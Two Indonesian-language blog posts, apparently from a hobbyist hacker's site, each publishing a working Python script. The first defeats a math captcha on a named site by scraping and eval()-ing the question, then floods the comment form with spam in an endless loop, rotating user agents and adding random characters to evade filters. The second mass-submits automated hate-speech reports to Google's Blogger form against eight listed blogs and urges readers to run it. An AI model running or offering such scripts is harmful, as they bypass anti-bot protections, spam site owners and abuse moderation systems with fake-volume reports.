break a time, with break the c0de…

Posts tagged “mechanize

virusindonesia.com captcha broke


yah, tadi awalnya cuma iseng
ngeliat virus yang dibuat sama temen
bisa dilihat disini :
http://virusindonesia.com/2010/08/30/flyff-reinkarnasi-amburadul/

berhubungan saya lagi banyak bereksperimen tentang captcha
sekaligus saya hanya ingin mengingatkan bahwa captcha tersebut tidak baik
mengingat bahwa captcha tersebut dapat di kalahkan dengan metode simulasi

berikut sourcecode dari program…

#!/usr/bin/python
import mechanize, cookielib, re, time, random
randstring	= ['a','b','c','d','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',
		   'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',
		   '1','2','3','4','5','6','7','8','9','0'
		  ]
header = {
          "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3",
          "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
          "Accept-Language": "en-us,en;q=0.5",
          "Accept-Encoding": "gzip,deflate",
          "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
          "Keep-Alive": "99999",
          "Proxy-Connection": "keep-alive",
          "Content-Type": "application/x-www-form-urlencoded"
}
ouruseragent 	= ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
		'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1',
		'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
		'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
		'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
        	'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
        	'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
        	'Microsoft Internet Explorer/4.0b1 (Windows 95)',
        	'Opera/8.00 (Windows NT 5.1; U; en)',
		'amaya/9.51 libwww/5.4.0',
		'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
		'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
		'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
		'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
		'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
		'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
		
br = mechanize.Browser()
# Cookie Jar
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
# Browser options
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
# Follows refresh 0 but not hangs on refresh > 0
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
# Want debugging messages ??
#br.set_debug_http(True)
#br.set_debug_redirects(True)
#br.set_debug_responses(True)
# try to cheating
br.addheaders = [('User-agent', random.choice(ouruseragent))]

def main():
	'''infinite loop'''
	while 1:
		print "[*] Going to virusindonesia.com"
		page = br.open("http://virusindonesia.com/2010/08/30/flyff-reinkarnasi-amburadul/")
		read = page.read()
		captcha = re.findall("<strong>Hasil dari (.*) ?</strong>",read)
		captchaclean = captcha[0]
		captchaclean = captchaclean.replace(" ?","")
		print "[*] Got question   : %s " % captchaclean
		result = eval(''.join([str(x) for x in captchaclean])) # we give her to thinking some math ;)
		print "[*] Program answer : %d " % int(result)
		br.select_form(nr=1)
		br.form['author'] = 'rise of robot !!!'
		br.form['email'] = 'yudha.gunslinger@gmail[dot]com'
		br.form['url'] = 'http://gunslingerc0de.wordpress[dot]com'
		br.form['mcspvalue'] = str(result)
		br.form['comment'] = '''
		RISE OF ROBOT !!
		
		YOUR CAPTCHA DEFEATED !!
		PLEASE PATCH !!
		https://gunslingerc0de.wordpress.com
		%s%s%s
		''' % (str(random.choice(randstring)), str(random.choice(randstring)), str(random.choice(randstring))) # prevent blocking by string checker ;)
		br.submit()
		# print br.response().read()
		print "[*] Spammed successfully..."
		time.sleep(1)
		print "[*] Sleeping for 30 seconds please wait"
		time.sleep(30) # prevent blocking too, so wee need time.sleep() ;)... or we got forbidden status ;)
		print "[*] Ready to rock baby..."
		
if __name__ == '__main__':
	main()

ketika saya telah mengingatkan dengan beberapa spam, beberapa menit kemudian sudah di hapus oleh virusindonesia sendiri (well good job quick responds)
dengan ini saya harap situs tersebut mau mengganti captchanya agar tidak terspamming oleh yang lain ;)

Advertisements

domainreporter.py | malaysia hate speech domain report


well, sebelumnya mohon maaf blog ini belum terdapat update dalam beberapa minggu
dikarenakan penulis sedang sibuk dengan research yg harus dikerjakan .
ok, awalnya saya tadi liat blog http://indonbodoh.blogspot.com
tentu saya sebagai orang indonesia sangat geram dengan perlakuan ini,
daripada saya ikut berkomentar tidak jelas di blog itu, tentunya saya lebih baik memikirkan bagaimana blog tersebut hilang selamanya
dan ternyata teman saya juga melaporkan list blog yang telah melecehkan indonesia
yep semakin senang saya, karena mudah2an bisa jadi sasaran empuk program ini…
dan listnya sebagai berikut…

http://indonbodoh.blogspot.com/
http://indoncelaka.blogspot.com/
http://ihateindon.blogspot.com/
http://dontvisitindon2008.blogspot.com/
http://kamiantiindon.blogspot.com/
http://arezeo.blogspot.com/
http://sayabenciindon.blogspot.com/
http://www.penipuan-jawa.blogspot.com/

dan saya pun memilih untuk membuat program untuk report ke google
karena site tersebut sangat mengandung hate speech
saya berharap akan lenyap karena telah di report ke database dalam jumlah banyak
tentunya lebih membantu jika teman2 ikut menjalankan program ini
berikut adalah sourcecodenya :

#!/usr/bin/python
# programmer : gunslinger_ <yudha.gunslinger@gmail.com>
# please use this tools to vanish that domain, i hope google responds this !
# this program is defeated form encryption multipart/form-data
# so you need to install http://pypi.python.org/pypi/MultipartPostHandler/0.1.0 python module
# tips :
# - extract the folder
# - python setup.py build
# - sudo python setup.py install
# then program ready to rock !
import urllib2, random, sys
try:
	import MultipartPostHandler
except ImportError:
	print "[*] Please install MultipartPostHandler first"
	
def main():
	try:
		domain		= ['http://indonbodoh.blogspot.com/',
				'http://indoncelaka.blogspot.com/',
				'http://ihateindon.blogspot.com/',
				'http://dontvisitindon2008.blogspot.com/',
				'http://kamiantiindon.blogspot.com/',
				'http://arezeo.blogspot.com/',
				'http://sayabenciindon.blogspot.com/',
				'http://www.penipuan-jawa.blogspot.com/'
				]
		ouruseragent 	= ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
				'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1',
				'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
				'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
				'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
		        	'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
		        	'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
		        	'Microsoft Internet Explorer/4.0b1 (Windows 95)',
		        	'Opera/8.00 (Windows NT 5.1; U; en)',
				'amaya/9.51 libwww/5.4.0',
				'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
				'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
				'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
				'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
				'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
				'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
		success = 'Thanks for reporting this possible Terms of Service violation. We will examine it soon and take action as necessary.'
		opener 	= urllib2.build_opener(MultipartPostHandler.MultipartPostHandler)
		counter = 1
		while 1:	
			opener.addheaders = [('User-agent', random.choice(ouruseragent))]
			params = { 'extra.blog_URL' : random.choice(domain)
				}
			openserver = opener.open('http://www.google.com/support/blogger/bin/request.py?hl=en&ctx=submitted&confirm=hate_speech', params)
			result = openserver.read()
			if success in result:
				sys.stdout.write("%s[*] %s way success reporting domain %s to google ! %s" % ("\r", int(counter), params['extra.blog_URL'], " "*80))
				sys.stdout.flush()
			else:
				print "[*] Failed ! please try again !"
				sys.exit(1)
			counter = int(counter) + 1
	except KeyboardInterrupt:
		print "\n[*] Exiting program\n"
		sys.exit(1)
	except urllib2.HTTPError:
		print "\n[*] Connections problem, please try again !\n"
		sys.stdout(1)

if __name__ == '__main__':
	print "domainreporter.py"
	print "gunslinger_ <yudha.gunslinger@gmail.com>"
	main()

action :

ps : sekali lagi mohon maaf penulis belum bisa menulis beberapa artikel di blog ini, dikarenakan sedang disibukan oleh sesuatu…